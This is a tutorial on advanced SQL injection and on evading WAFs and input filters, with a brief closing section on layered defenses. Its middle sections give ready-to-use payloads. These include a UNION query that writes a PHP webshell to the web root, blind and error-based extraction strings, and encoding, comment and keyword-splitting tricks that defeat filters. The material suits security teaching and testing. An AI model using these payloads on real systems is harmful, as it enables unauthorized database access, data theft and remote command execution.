Advanced Exploitation of SQL Injection Attacks and Defense Bypass Techniques - A Detailed Guide

1. Knowledge Point Description
Advanced SQL Injection exploitation and defense bypass techniques represent a deepening of basic SQL injection skills, primarily targeting systems that have already deployed fundamental protective measures (such as WAFs, input filtering, parameterized queries, etc.). Attackers meticulously craft payloads, leverage database features, and employ techniques like encoding conversion to bypass security defenses and successfully execute malicious SQL statements. These techniques reflect the evolving nature of the attack-defense arms race and constitute a core challenge in the field of web security.

2. Advanced SQL Injection Exploitation Techniques

2.1 Extension of Union Query Injection

• Deepened Principle: Union queries are not limited to data retrieval; they can also be used to execute system commands (e.g., using MySQL's INTO OUTFILE to write files).
• Key Steps:
  1. After determining the number of fields, use UNION SELECT to write a webshell.

  UNION SELECT 1, '<?php system($_GET["cmd"]); ?>', 3 INTO OUTFILE '/var/www/html/shell.php'
  

  2. Requires the database user to have FILE privileges and the secure_file_priv setting must permit the operation.

2.2 Automation of Boolean-Based Blind Injection

• Principle: When there is no explicit error on the page but a difference in true/false states exists, data is extracted bit by bit through logical judgment.
• Implementation Process:
  1. Construct conditional judgment statements: id=1' AND (SELECT ASCII(SUBSTRING(database(),1,1)))=104 --
  2. Determine the truth of the condition based on differences in page response (e.g., content length, status code).
  3. Use tools (like sqlmap) or scripts to automate the guessing of database names, table names, and field values.

2.3 Precise Control in Time-Based Blind Injection

• Principle: Achieves data extraction in scenarios with no visible output by utilizing database delay functions.
• Key Technical Points:
  1. MySQL's SLEEP(), BENCHMARK() functions.
  2. Combining conditional judgment with delays: id=1' AND IF(SUBSTRING(database(),1,1)='a', SLEEP(5), 0) --
  3. Determine the truth of the condition based on response time differences (response time > 5 seconds indicates true).

2.4 Diversified Exploitation of Error-Based Injection

• Principle: Exploits database error messages to leak data.
• Common Techniques:
  1. extractvalue() function: id=1' AND extractvalue(1, concat(0x7e, (SELECT database()))) --
  2. updatexml() function: Utilizes XPath errors to leak data.
  3. Geometry function errors: Functions like ST_LatFromGeoHash() in MySQL 5.7+.

3. Detailed Defense Bypass Techniques

3.1 Encoding Bypass Techniques

• URL Encoding: Double-encoding special characters (e.g., %2527 instead of a single quote).
• Hexadecimal Encoding: Converting strings to hexadecimal (e.g., SELECT → 0x53454c454354).
• Unicode Encoding: Bypassing filters using international character sets (e.g., %u0027, %u0053).

3.2 Comment Character Obfuscation Techniques

• Multiple Comment Character Combinations: Alternating use of /**/, -- -, #, ;%00, etc.
• Inline Comments: MySQL's /*!50000SELECT*/ can bypass simple keyword filters.
• Flexible Placement of Comment Characters: Inserting comment characters within keywords (e.g., SEL/**/ECT).

3.3 Keyword Substitution and Splitting

• Case Mixing: SeLeCt, UnIoN to bypass case-sensitive filters.
• Double-Writing Keywords: SELSELECTECT to bypass simple replacement filters (e.g., those that replace SELECT with empty string).
• Splitting with Special Characters: Using newline %0a, tab %09, etc., to split keywords.

3.4 Parameter Pollution Techniques

• Principle: Leverages parameter parsing characteristics to pass malicious parameters.
• Implementation: id=1&id=2' UNION SELECT 1,2,3 --, where the WAF might inspect the first parameter, but the application uses the last one.

3.5 Exploiting Database-Specific Features

• MySQL Feature Bypass:
  • Utilizing version-specific comments like /*!50000*/.
  • Wrapping keywords with backticks: SELECT `version`().
• SQL Server Features:
  • Using EXEC() for dynamic execution: EXEC('SELECT * FROM users').
  • Symbol separation: SELECT+1, SELECT.1.

4. Practical Advanced Bypass Case Studies

4.1 Bypassing WAF for Union Query Injection

Original payload: UNION SELECT 1,2,3 FROM admin
Bypass solutions:
1' UniOn/**/SeLeCt 1,2,3 FrOm admin --+
Or using hexadecimal: 1' UNION SELECT 1,2,3 FROM 0x61646d696e --

4.2 Bypassing Filters in Time-Based Blind Injection

Basic Filter: Filters keywords like SLEEP, BENCHMARK.
Bypass Solution:
1' AND (SELECT * FROM (SELECT(IF(ASCII(SUBSTR(database(),1,1))=104,
(SELECT COUNT(*) FROM information_schema.tables A, information_schema.tables B, information_schema.tables C),0)))a) --
Utilizes Cartesian products to create delays.

5. Evolution of Defense Measures

5.1 Multi-Layered Defense System

• Input Validation: Whitelist validation is superior to blacklist filtering.
• Parameterized Queries: Using prepared statements to completely avoid concatenation.
• Principle of Least Privilege: Database accounts are granted permissions strictly as needed.
• WAF Rule Updates: Dynamic rules based on regular expressions and behavioral analysis.

5.2 In-Depth Defense Strategies

• Application Layer: Unified encoding handling, secure coding standards.
• Network Layer: WAF deployment, traffic monitoring.
• Database Layer: Stored procedure encapsulation, security configuration hardening.
• Operations Layer: Log auditing, vulnerability scanning.

6. Summary
Advanced SQL injection techniques reflect the ongoing evolution of the attack-defense arms race. Defenders need to establish a defense-in-depth architecture, rather than relying on a single protective measure. Understanding the principles behind these techniques not only aids in security protection but also demonstrates a deep comprehension of database systems and web application architecture. In practical defense, parameterized queries remain the most effective fundamental solution currently available.